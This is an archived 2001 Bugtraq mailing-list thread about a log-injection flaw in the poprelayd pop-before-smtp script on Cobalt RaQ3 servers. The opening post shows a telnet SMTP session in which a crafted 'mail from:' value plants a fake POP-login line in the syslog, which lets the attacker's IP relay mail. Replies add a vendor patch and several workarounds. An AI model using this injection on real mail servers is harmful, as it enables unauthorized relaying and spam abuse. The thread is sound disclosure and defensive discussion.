6706890 2001-07-03 19:05 +0200 /64 rader/ Andrea Barisani <lcars@infis.univ.trieste.it>
Sänt av: joel@lysator.liu.se
Importerad: 2001-07-04 21:53 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <17784>
Ärende: poprelayd and sendmail relay authentication problem (Cobalt Raq3)
------------------------------------------------------------
From: Andrea Barisani <lcars@infis.univ.trieste.it>
To: bugtraq@securityfocus.com
Message-ID: <Pine.LNX.4.10.10107031827400.24489-100000@sole.infis.univ.trieste.it>
Hi to all,
Poprelayd is a simple script that scan /var/log/maillog for valid pop
logins and updates a hash db used by sendmail to permit relaying for
those valid pop users, this method is called "Pop-before-smtp".
The syslog string searched by the script is in this form for the qpop
server
/POP login by user \"[\-\_\w]+\" at \(.+\) ([0-9]\.]+)/)
On some cobalt raq3 servers (with the poprelayd add-on packet
installed ) and in general on any system running the poprelayd
script with sendmail is possible to "inject" this string in the
syslog using sendmail logging. So anyone can insert a fake string
with his own IP wich will be parsed by poprelayd and that will permit
the use of sendmail as a relay.
On cobalts the presence of poprelayd is revealed by the modified
sendmail relaying denied message "Relaying denied. Please check your
mail first."
Example:
telnet dumbcobalt 25
Trying 123.123.123.123...
Connected to dumbcobalt
...
ehlo dumbcobalt
...
mail from:"POP login by user "admin" at (66.66.66.66) 66.66.66.66
@linux.org"
553 "POP login by user "admin" at (66.66.66.66) 66.66.66.66
@linux.org"...Domain name required
now the IP 66.66.66.66 can do relay :)
in fact, on dumbcobalt:
in /var/log/maillog
...reject=533 "POP login by user "admin" at (66.66.66.66) 66.66.66.66
@linux.org", size=0, class=0 ....etc etc...
[root@dumbcobalt /]# /usr/sbin/poprelayd -p
66.66.66.66 7
;-)
Bye
------------------------------------------------------------
INFIS Network Administrator & Security Officer
Department of Physics - University of Trieste
lcars@infis.univ.trieste.it - PGP Key 0x8E21FE82
------------------------------------------------------------
"How would you know I'm mad?" said Alice.
"You must be,'said the Cat,'or you wouldn't have come here."
------------------------------------------------------------
(6706890) /Andrea Barisani <lcars@infis.univ.trieste.it>/(Ombruten)
Kommentar i text 6727613 av Will DeHaan <eclipse@sun.com>
6727613 2001-07-09 12:03 -0700 /38 rader/ Will DeHaan <eclipse@sun.com>
Sänt av: joel@lysator.liu.se
Importerad: 2001-07-10 02:41 av Brevbäraren
Extern mottagare: Andrea Barisani <lcars@infis.univ.trieste.it>
Extern kopiemottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <17873>
Kommentar till text 6706890 av Andrea Barisani <lcars@infis.univ.trieste.it>
Ärende: Re: poprelayd and sendmail relay authentication problem (Cobalt Raq3)
------------------------------------------------------------
Andrea Barisani wrote:
>
> On some cobalt raq3 servers (with the poprelayd add-on packet installed )
> and in general on any system running the poprelayd script with sendmail is
> possible to "inject" this string in the syslog using sendmail logging. So
> anyone can insert a fake string with his own IP wich will be parsed by
> poprelayd and that will permit the use of sendmail as a relay.
Hello,
Attached you'll find an experimental patch (apply to
/usr/local/sbin/poprelayd) to immediately correct the email relay
exploit. This patch is integrated into the current version 2.0
poprelayd RPM at:
ftp://ftp.cobaltnet.com/pub/experimental/RPMS/poprelayd-2.0-4.noarch.rpm
md5sum 52af3c84c93914908ced089526521330
ftp://ftp.cobaltnet.com/pub/experimental/SRPMS/poprelayd-2.0-4.src.rpm
md5sum 4a526733a2da5cfe996f53032b136e1e
A supported fix to this email relay exploit will be integrated into
forthcoming security update packages for Qube and RaQ products.
Thank you for reporting this issue to Bugtraq. We also appreciate
direct reporting of any Sun Cobalt security issues by sending email to
security@cobalt.com.
Cheers,
-- Will
--
Will DeHaan
Software Engineer will.dehaan@sun.com
Sun Cobalt Server Appliances. Sun Microsystems, Inc.
(6727613) /Will DeHaan <eclipse@sun.com>/-(Ombruten)
Bilaga (text/plain) i text 6727614
6727614 2001-07-09 12:03 -0700 /29 rader/ Will DeHaan <eclipse@sun.com>
Bilagans filnamn: "poprelay.regexpoit.patch"
Importerad: 2001-07-10 02:41 av Brevbäraren
Extern mottagare: Andrea Barisani <lcars@infis.univ.trieste.it>
Extern kopiemottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <17874>
Bilaga (text/plain) till text 6727613
Ärende: Bilaga (poprelay.regexpoit.patch) till: Re: poprelayd and sendmail relay authentication problem (Cobalt Raq3)
------------------------------------------------------------
--- poprelayd-2.0-3 Mon Jul 9 10:29:40 2001
+++ poprelayd Mon Jul 9 10:27:27 2001
@@ -175,16 +175,19 @@
my $s = $_[0];
my @paddrs; # Packed IP addresses.
my @addrs; # ASCII addresses.
- my $junk;
# POP login by user "admin" at (10.9.28.29) 10.9.28.29
- if ($s =~ /POP login by user \"[\-\_\w]+\" at \(.+\) ([0-9\.]+)/) {
- return $1;
+ # ensure line ends at IP address. Filter on rejection codes
+ if ($s =~ /POP login by user \"[\-\_\w]+\" at \(.+\) ([0-9\.]+)\s*$/) {
+ my $authuser = $1;
+ return $authuser unless ($s =~ /reject=\d/i);
}
# imapd[11676]: Authenticated user=admin host=pyro.cobalt.com [10.9.28.29]
- if ($s =~ /Authenticated user=\S+ host=\S+ \[([\d\.]+)\]/) {
- return $1;
+ # ensure line ends at IP address. Filter on rejected syntax.
+ if ($s =~ /Authenticated user=\S+ host=\S+ \[([\d\.]+)\]\s*$/) {
+ my $authuser = $1;
+ return $authuser unless ($s =~ /unknown command/i);
}
return ();
(6727614) /Will DeHaan <eclipse@sun.com>/-----------
6718012 2001-07-06 16:04 -0400 /22 rader/ Christopher X. Candreva <chris@westnet.com>
Sänt av: joel@lysator.liu.se
Importerad: 2001-07-07 22:03 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <17838>
Kommentar till text 6715164 av Ram'on Reyes Carri'on <ramon@cimat.mx>
Ärende: Re: poprelayd and sendmail relay authentication problem (Cobalt
------------------------------------------------------------
Raq3)
From: "Christopher X. Candreva" <chris@westnet.com>
To: <bugtraq@securityfocus.com>
Message-ID: <Pine.GSO.4.33.0107061602211.16143-100000@westnet>
On Fri, 6 Jul 2001, Ram'on Reyes Carri'on wrote:
> A quick workaround that I have just applied is to make sure that the
> string does not contain /sendmail/ so it cannot be injected into syslog
> via sendmail (may be injected some other way!).
Another workaround is to simply have your POP/IMAP daemons log to
their own facility (ie -- one of the locals). We've done this for
years anyway, as it makes using the logs to find problems much easier.
==========================================================
Chris Candreva -- chris@westnet.com -- (914) 967-7816
WestNet Internet Services of Westchester
http://www.westnet.com/
(6718012) /Christopher X. Candreva <chris@westnet.com>/(Ombruten)
Kommentar i text 6725821 av Chris Adams <cmadams@hiwaay.net>
6725821 2001-07-07 15:06 -0500 /19 rader/ Chris Adams <cmadams@hiwaay.net>
Sänt av: joel@lysator.liu.se
Importerad: 2001-07-09 18:28 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <17852>
Kommentar till text 6718012 av Christopher X. Candreva <chris@westnet.com>
Ärende: Re: poprelayd and sendmail relay authentication problem (Cobalt Raq3)
------------------------------------------------------------
From: Chris Adams <cmadams@hiwaay.net>
To: bugtraq@securityfocus.com
Message-ID: <20010707150657.A31184@HiWAAY.net>
Once upon a time, Christopher X. Candreva <chris@westnet.com> said:
> Another workaround is to simply have your POP/IMAP daemons log to their own
> facility (ie -- one of the locals). We've done this for years anyway, as it
> makes using the logs to find problems much easier.
Better yet, have your POP daemon update the access file directly, and
then you don't have any of the hokey "tail the log file" stuff going
on at all. All you need to add is a daemon to remove entries from
the access file.
--
Chris Adams <cmadams@hiwaay.net>
Systems and Network Administrator - HiWAAY Internet Services
I don't speak for anybody but myself - that's enough trouble.
(6725821) /Chris Adams <cmadams@hiwaay.net>/(Ombruten)
Kommentar i text 6727425 av Todd R. Eigenschink <todd@tekinteractive.com>
Kommentar i text 6727497 av <bdoctor@ps-ax.com>
Kommentar i text 6727532 av Christoph Kuhles <ck-bugtraq@aquatix.de>
Kommentar i text 6727558 av Jason Clifford <jason@uklinux.net>
6727425 2001-07-09 11:25 -0500 /22 rader/ Todd R. Eigenschink <todd@tekinteractive.com>
Sänt av: joel@lysator.liu.se
Importerad: 2001-07-10 00:54 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Externa svar till: todd@tekinteractive.com
Mottagare: Bugtraq (import) <17865>
Kommentar till text 6725821 av Chris Adams <cmadams@hiwaay.net>
Ärende: Re: poprelayd and sendmail relay authentication problem (Cobalt Raq3)
------------------------------------------------------------
From: "Todd R. Eigenschink" <todd@tekinteractive.com>
To: bugtraq@securityfocus.com
Message-ID: <15177.56070.650024.937758@rtfm.ofc.tekinteractive.com>
Chris Adams writes:
>Better yet, have your POP daemon update the access file directly, and
>then you don't have any of the hokey "tail the log file" stuff going on
>at all. All you need to add is a daemon to remove entries from the
>access file.
I have patches for qpopper 2.53 and 3.1.2 (and will be forward-porting
them to 4.0.3 this weekend) and the daemon to remove entries. If
anyone's interested, mail me.
Todd
--
Todd R. Eigenschink TEK Interactive Group, Inc.
todd@tekinteractive.com http://www.tekinteractive.com/
System Administrator (219) 459-2521
(6727425) /Todd R. Eigenschink <todd@tekinteractive.com>/
6727497 2001-07-09 00:52 -0600 /20 rader/ <bdoctor@ps-ax.com>
Sänt av: joel@lysator.liu.se
Importerad: 2001-07-10 01:23 av Brevbäraren
Extern mottagare: Chris Adams <cmadams@hiwaay.net>
Extern kopiemottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <17867>
Kommentar till text 6725821 av Chris Adams <cmadams@hiwaay.net>
Ärende: Re: poprelayd and sendmail relay authentication problem (Cobalt Raq3)
------------------------------------------------------------
From: bdoctor@ps-ax.com
To: Chris Adams <cmadams@hiwaay.net>
Cc: bugtraq@securityfocus.com
Message-ID: <200107090652.f696qiu22790@ps-ax.com>
Sorry for the plug, but I can't help myself:
http://ps-ax.com/Relay/
This does what this thread has been speaking of via a patch to
Qpopper, versions from 2.53 to present. I think it fills the void.
-brad
> Better yet, have your POP daemon update the access file directly, and
> then you don't have any of the hokey "tail the log file" stuff going on
> at all. All you need to add is a daemon to remove entries from the
> access file.
(6727497) / <bdoctor@ps-ax.com>/----------(Ombruten)
6727532 2001-07-09 19:04 +0200 /24 rader/ Christoph Kuhles <ck-bugtraq@aquatix.de>
Sänt av: joel@lysator.liu.se
Importerad: 2001-07-10 01:40 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Externa svar till: ck-bugtraq@aquatix.de
Mottagare: Bugtraq (import) <17868>
Kommentar till text 6725821 av Chris Adams <cmadams@hiwaay.net>
Ärende: Re[2]: poprelayd and sendmail relay authentication problem (Cobalt Raq3)
------------------------------------------------------------
From: Christoph Kuhles <ck-bugtraq@aquatix.de>
To: bugtraq@securityfocus.com
Message-ID: <85-1593912896.20010709190431@aquatix.de>
Hi,
Saturday, July 07, 2001, 10:06:57 PM, you wrote:
CA> Better yet, have your POP daemon update the access file directly,
and CA> then you don't have any of the hokey "tail the log file"
stuff going on CA> at all. All you need to add is a daemon to remove
entries from the CA> access file.
True. If I may recomment popa3d (http://www.openwall.com/popa3d/) for
that ... There's a patch available on their website which does exactly
that.
Cheers,
Christoph Kuhles
Technical Operations
Aquatix IT-Services
(6727532) /Christoph Kuhles <ck-bugtraq@aquatix.de>/(Ombruten)
6727558 2001-07-09 18:59 +0100 /22 rader/ Jason Clifford <jason@uklinux.net>
Sänt av: joel@lysator.liu.se
Importerad: 2001-07-10 01:59 av Brevbäraren
Extern mottagare: Chris Adams <cmadams@hiwaay.net>
Extern kopiemottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <17869>
Kommentar till text 6725821 av Chris Adams <cmadams@hiwaay.net>
Ärende: Re: poprelayd and sendmail relay authentication problem (Cobalt
------------------------------------------------------------
Raq3)
From: Jason Clifford <jason@uklinux.net>
To: Chris Adams <cmadams@hiwaay.net>
Cc: <bugtraq@securityfocus.com>
Message-ID: <Pine.LNX.4.30.0107091857530.22708-100000@s1.uklinux.net>
On Sat, 7 Jul 2001, Chris Adams wrote:
> Better yet, have your POP daemon update the access file directly, and
> then you don't have any of the hokey "tail the log file" stuff going on
> at all. All you need to add is a daemon to remove entries from the
> access file.
All of which is an awful horrendous hack.
SMTP AUTH is fairly easy to implement. It's reliable. You don't have
to worry about IPs being accidentally left in a hash resulting in
unwanted relaying and you can properly trace the sender of mails.
Jason
(6727558) /Jason Clifford <jason@uklinux.net>/(Ombruten)
Kommentar i text 6727923 av Walter Reed <walt@hubinternet.com>
6727923 2001-07-09 17:28 -0700 /33 rader/ Walter Reed <walt@hubinternet.com>
Sänt av: joel@lysator.liu.se
Importerad: 2001-07-10 08:18 av Brevbäraren
Extern mottagare: Jason Clifford <jason@uklinux.net>
Extern kopiemottagare: Chris Adams <cmadams@hiwaay.net>
Extern kopiemottagare: bugtraq@securityfocus.com
Externa svar till: walt@hubinternet.com
Mottagare: Bugtraq (import) <17879>
Kommentar till text 6727558 av Jason Clifford <jason@uklinux.net>
Ärende: Re: poprelayd and sendmail relay authentication problem (Cobalt Raq3)
------------------------------------------------------------
From: Walter Reed <walt@hubinternet.com>
To: Jason Clifford <jason@uklinux.net>
Cc: Chris Adams <cmadams@hiwaay.net>, bugtraq@securityfocus.com
Message-ID: <20010709172806.A26264@hubinternet.com>
On Mon, Jul 09, 2001 at 06:59:04PM +0100, Jason Clifford wrote:
> On Sat, 7 Jul 2001, Chris Adams wrote:
>
> > Better yet, have your POP daemon update the access file directly, and
> > then you don't have any of the hokey "tail the log file" stuff going on
> > at all. All you need to add is a daemon to remove entries from the
> > access file.
>
> All of which is an awful horrendous hack.
>
> SMTP AUTH is fairly easy to implement. It's reliable. You don't have to
> worry about IPs being accidentally left in a hash resulting in unwanted
> relaying and you can properly trace the sender of mails.
Actually, I've found SMTP AUTH rather a pain to get right. You have
to get a number of different packages (sasl, openssl, etc.) figure
out how to get all the configure options right, build in the right
order, beat sendmail over the head to get things linked right,
etc. Now get the thing to authenticate with an NT domain
controller. This is far from trivial and the howto is weak. I haven't
had the several days it takes to get it working. I don't quite know
how I'm going to do the NT dom auth yet, maybe through a pam
module. Anyone do this already?
Sendmail / postfix / etc need to integrate SMTP AUTH into the base
rather than the add-on mess we have. It needs to be the default. This
may help combat the open-relay disease we have today as well.
(6727923) /Walter Reed <walt@hubinternet.com>/(Ombruten)
6718096 2001-07-06 21:33 -0400 /37 rader/ Ed Ravin <eravin@panix.com>
Sänt av: joel@lysator.liu.se
Importerad: 2001-07-07 22:47 av Brevbäraren
Extern mottagare: Ram'on Reyes Carri'on <ramon@cimat.mx>
Extern kopiemottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <17841>
Kommentar till text 6715164 av Ram'on Reyes Carri'on <ramon@cimat.mx>
Ärende: Re: poprelayd and sendmail relay authentication problem
------------------------------------------------------------
From: Ed Ravin <eravin@panix.com>
To: ramon@cimat.mx (Ram'on Reyes Carri'on)
Cc: bugtraq@securityfocus.com
Message-ID: <200107070133.f671Xam02266@panix1.panix.com>
Ram'on Reyes Carri'on writes:
> A quick workaround that I have just applied is to make sure that the
> string does not contain /sendmail/ so it cannot be injected into syslog
> via sendmail (may be injected some other way!).
Better to anchor the pattern match to the beginning of the line, so
that there is no way any program can trick poprelayd. For example:
if ($s =~ /^\w+\s+\d+\s+\d+:\d+:\d+\s+[^: ]+ (imapd|pop3d)\[(\d+)\]: login: \S*\[(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})\]/) {
($daemon, $pid, $clientip)= ($1, $2, $3);
add_to_db($clientip);
}
The above example is for US-style syslog timestamps, things might be
different elsewhere. Also, you need to make sure that your syslogd
is not accepting traffic from anywhere except a local Unix-domain
socket, since otherwise the attacker could forge a syslog message
directly.
> > The syslog string searched by the script is in this form for the qpop
> > server
> >
> > /POP login by user \"[\-\_\w]+\" at \(.+\) ([0-9]\.]+)/)
> >
> > On some cobalt raq3 servers (with the poprelayd add-on packet installed )
> > and in general on any system running the poprelayd script with sendmail is
> > possible to "inject" this string in the syslog using sendmail logging. So
> > anyone can insert a fake string with his own IP wich will be parsed by
> > poprelayd and that will permit the use of sendmail as a relay.
(6718096) /Ed Ravin <eravin@panix.com>/-------------